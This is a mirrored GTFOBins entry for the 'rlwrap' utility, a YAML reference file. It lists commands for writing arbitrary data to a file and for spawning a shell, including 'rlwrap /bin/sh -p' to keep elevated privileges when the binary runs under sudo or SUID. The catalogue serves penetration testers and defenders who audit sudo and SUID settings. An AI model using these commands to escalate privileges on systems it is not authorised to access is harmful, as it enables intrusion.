1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/rlwrap
2026-01-07 21:59:13 +01:00

24 lines
443 B
Plaintext

---
functions:
file-write:
- binary: false
code: |-
rlwrap -l /path/to/output-file echo DATA
comment: |-
This adds timestamps to the output file. This relies on the external `echo` command.
contexts:
sudo:
suid:
unprivileged:
shell:
- code: |-
rlwrap /bin/sh
contexts:
sudo:
suid:
code: |-
rlwrap /bin/sh -p
shell: false
unprivileged:
...